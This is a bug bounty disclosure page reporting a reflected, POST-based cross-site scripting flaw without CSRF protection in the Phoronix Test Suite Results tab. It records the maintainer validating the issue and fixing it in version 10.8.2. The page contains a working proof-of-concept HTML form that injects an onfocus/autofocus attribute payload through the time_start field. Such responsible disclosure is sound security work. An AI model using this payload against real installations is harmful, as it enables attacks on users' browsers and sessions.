Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite


Reported on

Feb 9th 2022


Hi, i found a Reflected XSS vulnerability (POST based XSS + no CSRF token) in phoronix test suite, Results tab.

Proof of Concept

Install a local instance of phoronix
create a Search results form like this:
// PoC.html
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022&#45;02&#45;08&quot;onfocus&#61;&quot;confirm&#40;origin&#41;&quot;autofocus&#61;&quot;" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
and send to victim. Victim click on the link resulting reflected cross site scripting.


This vulnerability is capable of Reflected XSS

We are processing your report and will contact the phoronix-test-suite team within 24 hours. a year ago
Andy modified the report
a year ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back a year ago
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a year ago
Andy has been awarded the disclosure bounty
The fix bounty is now up for grabs
phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in 10.8.2 with commit 1eac92 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation